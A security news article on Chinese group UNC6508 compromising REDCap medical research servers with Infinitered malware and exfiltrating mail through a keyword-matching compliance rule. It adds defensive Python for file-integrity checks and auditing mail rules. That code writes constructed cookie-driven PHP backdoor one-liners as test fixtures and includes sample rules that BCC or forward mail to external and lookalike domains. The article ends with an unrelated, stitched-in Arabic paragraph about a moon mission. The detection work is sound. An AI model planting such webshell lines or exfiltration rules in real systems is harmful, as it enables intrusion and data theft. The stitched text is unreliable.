Chinese Hackers Stole Medical Research Data Undetected for a Year

Key Takeaways

- Chinese threat actor UNC6508 maintained access to a medical research network for over 14 months before detection
- Custom malware called Infinitered was designed specifically to compromise REDCap research database servers
- Attackers used legitimate email compliance features to automatically exfiltrate data matching military and medical research keywords
What Happened
A China-linked hacking group breached REDCap servers at a North American medical research institution and remained undetected for more than a year. Google Threat Intelligence Group (GTIG) published findings on the campaign, attributing the attacks to a threat actor they track as UNC6508.
REDCap (Research Electronic Data Capture) is a web-based platform used by thousands of medical and academic institutions worldwide to manage clinical trial databases, patient surveys, and research data. Because it is built to hold regulated clinical-research data, a REDCap server concentrates exactly what an espionage group wants: patient records, trial results, and proprietary findings.
According to GTIG, the initial compromise occurred in September 2024 and the attackers retained access through November 2025: 14 months of undetected infiltration.
How the Attack Worked
GTIG researchers couldn't determine the exact initial entry point, but they observed UNC6508 probing older, vulnerable versions of REDCap. Three months after gaining access, the attackers deployed custom malware called Infinitered, designed specifically for REDCap systems.
Infinitered consists of three components: a persistence and update module, a credential harvester, and a backdoor. The attackers hid these components by trojanizing the server's system files.

The credential harvester captures usernames and passwords submitted through REDCap login pages, encrypts them, and stores them in local REDCap database tables for later retrieval. The backdoor receives commands via HTTP cookies and gives attackers the ability to:
- Execute shell commands on the server
- Upload and download files
- Run arbitrary SQL queries against research databases
- Retrieve or delete stolen credentials
- Extract system and database information
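Two checks a defender would run against a REDCap host after reading the description above: a hash baseline of the web root that is diffed later to surface trojanized or dropped files, and a triage scan for PHP that reads `$_COOKIE` and passes the value to an execution or decoding sink, which is the shape of a cookie-driven backdoor. This is an added example, not code from GTIG or the REDCap project; the web root, file names and the "trojanized" snippet are constructed, and the sink list is an assumption you should extend for your deployment.

```python
# Added example, not GTIG's or the REDCap project's code. Baseline-and-diff
# integrity check for a REDCap web root, plus a heuristic scan for PHP that
# takes input from $_COOKIE and hands it to an execution or decoding sink.
# The web root, sample files and the trojanized snippet are all constructed.
import hashlib
import re
import tempfile
from pathlib import Path

# Legitimate REDCap code reads cookies for sessions, so a cookie read alone
# is not evidence; the verdict needs a sink in the same file.
COOKIE_READ = re.compile(r"\$_COOKIE\b")
SINKS = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open|"
    r"base64_decode|gzinflate|str_rot13)\s*\("
)


def build_manifest(root):
    """Map every regular file under root (POSIX relative path) to its SHA-256."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def diff_manifest(baseline, current):
    """Return (added, removed, modified) relative paths between two manifests."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys() if baseline[p] != current[p])
    return added, removed, modified


def scan_php(root):
    """Relative paths of PHP files that both read $_COOKIE and call a sink."""
    root = Path(root)
    hits = []
    for p in sorted(root.rglob("*.php")):
        text = p.read_text(errors="replace")
        if COOKIE_READ.search(text) and SINKS.search(text):
            hits.append(p.relative_to(root).as_posix())
    return hits


def demo():
    """Constructed scenario: snapshot a clean tree, then simulate a trojanized
    file and a dropped file, and report what the two checks find."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text("<?php session_start(); echo 'REDCap'; ?>")
        (root / "Classes").mkdir()
        # benign cookie read: no sink, must not be flagged
        (root / "Classes" / "Auth.php").write_text("<?php $sid = $_COOKIE['PHPSESSID']; ?>")
        baseline = build_manifest(root)

        # simulated intrusion: backdoor spliced into an existing file, plus a new file
        (root / "Classes" / "Auth.php").write_text(
            "<?php $sid = $_COOKIE['PHPSESSID']; eval(base64_decode($_COOKIE['c'])); ?>"
        )
        (root / "Classes" / "cache.php").write_text("<?php system($_COOKIE['cmd']); ?>")

        added, removed, modified = diff_manifest(baseline, build_manifest(root))
        return {
            "added": added,
            "removed": removed,
            "modified": modified,
            "suspicious": scan_php(root),
        }


if __name__ == "__main__":
    print(demo())
```

Take the baseline immediately after a clean install or upgrade and keep it off the server (or compare against hashes of the vendor's release archive): an attacker who can edit the web root can also edit a manifest stored beside it. The PHP heuristic is a triage aid only; obfuscated loaders can avoid these patterns, so a hit is a reason to look, and a miss is not a clean bill of health.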
A Novel Exfiltration Technique
One technique stood out to GTIG researchers as new for China-linked threat actors. After gaining administrator access to the organization's cloud productivity suite, UNC6508 abused its legitimate "content compliance rules" feature, which inspects email for configured content and applies an action to matching messages, to exfiltrate data over email.
The attackers created a compliance rule named "Patroit" (the misspelling is as it appeared). The rule inspected the organization's email for specific keywords, content patterns, email addresses, and phone numbers, and every matching message was automatically blind-carbon-copied to an attacker-controlled Gmail address: BebitaBarefoot774@gmail.com. Google has since disabled this account.
The keywords targeted by this automated exfiltration reveal the attackers' priorities: medical research, advanced technology, military topics, and geo-strategic policy.

“The actors targeted institutions involved in clinical trials, drug discovery, and military intelligence, demonstrating a strategic interest in high-value intellectual property.”
— Google Threat Intelligence Group researchers
Strong Operational Security
GTIG noted a high level of operational security throughout the campaign. The attackers used US-based residential proxy infrastructure to mask their true location, routed traffic through compromised routers and virtual private servers, replayed legitimate credentials to blend in with normal activity, and kept dedicated infrastructure solely for data exfiltration.
This layered approach explains how UNC6508 avoided detection for so long. Traffic appeared to originate from ordinary US IP addresses, and day-to-day access relied on valid, harvested credentials rather than repeated exploitation that might trigger security alerts.
Who's at Risk
Google has notified multiple organizations in the US and Canada that were compromised. The company did not disclose the specific institutions affected.
Any organization running REDCap should audit its installation. The attackers specifically probed older, vulnerable versions, and self-hosted research infrastructure at academic institutions is particularly exposed: underfunded academic IT departments often cannot patch legacy server software as quickly as commercial enterprises.
Defensive Recommendations
Organizations using REDCap should take immediate steps to protect their installations. Update all REDCap instances to the latest version. Review server system files for unauthorized modifications. Audit content compliance rules for suspicious configurations. Monitor for unusual email forwarding rules, especially those sending BCCs to external addresses.
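The compliance-rule audit above can be scripted. The block below, an added example that is not GTIG's or Google's code, walks an export of mail routing and content-compliance rules and flags every rule whose BCC, add-recipient or forward action points outside the organization's domains, handling the "Name <addr>" form, case, plus-addressing, subdomains, and lookalike suffixes. The rule layout, the action names, the `ORG_DOMAINS` value and the sample rules are all assumed or constructed; adapt the loader to whatever your admin console or audit log actually emits.

```python
# Added example, not GTIG's or Google's code. Audits an export of email
# content-compliance / routing rules for recipients outside the organisation.
# The rule dict layout and the sample rules below are assumed/constructed;
# adapt the loading side to whatever your admin console or audit log emits.
from email.utils import parseaddr

ORG_DOMAINS = {"example-research.edu"}  # assumption: the institution's mail domains

# Actions that copy or redirect a message somewhere; names are illustrative.
RECIPIENT_ACTIONS = ("bcc", "add_recipients", "forward_to")


def normalize_address(raw):
    """'Name <User+tag@Host>' -> 'user@host'; None if no address is present."""
    _, addr = parseaddr(raw)
    addr = addr.strip().lower()
    if "@" not in addr:
        return None
    local, domain = addr.rsplit("@", 1)
    return f"{local.split('+', 1)[0]}@{domain}"


def is_internal(addr, org_domains=ORG_DOMAINS):
    """True for an org domain or any of its subdomains; lookalike suffixes fail."""
    domain = addr.rsplit("@", 1)[1]
    return any(domain == d or domain.endswith("." + d) for d in org_domains)


def audit_rules(rules, org_domains=ORG_DOMAINS):
    """Return one finding per rule that copies or forwards mail externally."""
    findings = []
    for rule in rules:
        external = set()
        for action in RECIPIENT_ACTIONS:
            for raw in rule.get("actions", {}).get(action, []):
                addr = normalize_address(raw)
                if addr and not is_internal(addr, org_domains):
                    external.add(addr)
        if external:
            findings.append({
                "rule": rule["name"],
                "external_recipients": sorted(external),
                "keywords": rule.get("match", {}).get("keywords", []),
            })
    return findings


# Constructed sample export. Only the last two rules leave the organisation;
# the legal-hold copy goes to a subdomain and must not be flagged.
SAMPLE_RULES = [
    {"name": "DLP - SSN outbound",
     "match": {"patterns": [r"\d{3}-\d{2}-\d{4}"]},
     "actions": {"quarantine": True}},
    {"name": "Legal hold copy",
     "match": {"keywords": ["subpoena"]},
     "actions": {"bcc": ["Legal Hold <legalhold@Mail.Example-Research.edu>"]}},
    {"name": "Patroit",
     "match": {"keywords": ["clinical trial", "drug discovery", "military"]},
     "actions": {"bcc": ["Mail Archive <archive-copy@example.net>"]}},
    {"name": "Vendor ticket sync",
     "match": {"keywords": ["ticket"]},
     "actions": {"forward_to": ["helpdesk@example-research.edu.evil.net"]}},
]


if __name__ == "__main__":
    for f in audit_rules(SAMPLE_RULES):
        print(f"{f['rule']!r} copies mail to {f['external_recipients']} on {f['keywords']}")
```

The check deliberately reports every external recipient, not only obviously hostile ones: a vendor sync that forwards tickets off-site is a legitimate finding to confirm, and the lookalike-domain case shows why a plain substring match on the org domain is not enough. Pair the one-off audit with alerting on the admin audit log for rule creation and changes, since a rule added by an admin account the attacker controls will look legitimate at the moment it is created.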
Network segmentation can limit damage if attackers breach perimeter defenses. Research databases containing sensitive IP should not share network segments with general-purpose systems. Infinitered's harvester gives the attacker valid passwords, so monitoring for logins from unexpected locations or proxies and rotating credentials after any suspected compromise limits what that harvest is worth.
Frequently Asked Questions
What is REDCap and why was it targeted?
REDCap (Research Electronic Data Capture) is a web-based platform used by thousands of medical and academic institutions to manage clinical research databases. It stores sensitive patient data and proprietary research findings, making it valuable for state-sponsored espionage groups seeking advantages in medical innovation.
How long did the hackers have access before being detected?
UNC6508 maintained undetected access for more than 14 months, from September 2024 through November 2025.
What data was stolen in the REDCap breach?
The attackers targeted data related to clinical trials, drug discovery, military topics, and geo-strategic policy. They used automated keyword searches to identify and exfiltrate valuable research.
How can organizations protect their REDCap installations?
Update to the latest REDCap version, audit system files for modifications, review email compliance rules for suspicious configurations, and implement network segmentation to isolate research databases.
Which organizations were affected by this breach?
Google notified multiple organizations in the US and Canada but did not publicly disclose specific names. Any institution running older REDCap versions should conduct security audits.
Source: BleepingComputer
Manaal Khan
Tech & Innovation Writer
تعتبر المهمة الجديدة خطوة هامة نحو استكشاف الفضاء وتطوير التكنولوجيا. سوف تشمل المهمة إرسال رواد فضاء إلى سطح القمر لconducting تجارب علمية. ستسهم هذه المهمة في تطوير فهمنا للفضاء وتحسين التكنولوجيا المستخدمة في استكشاف الفضاء.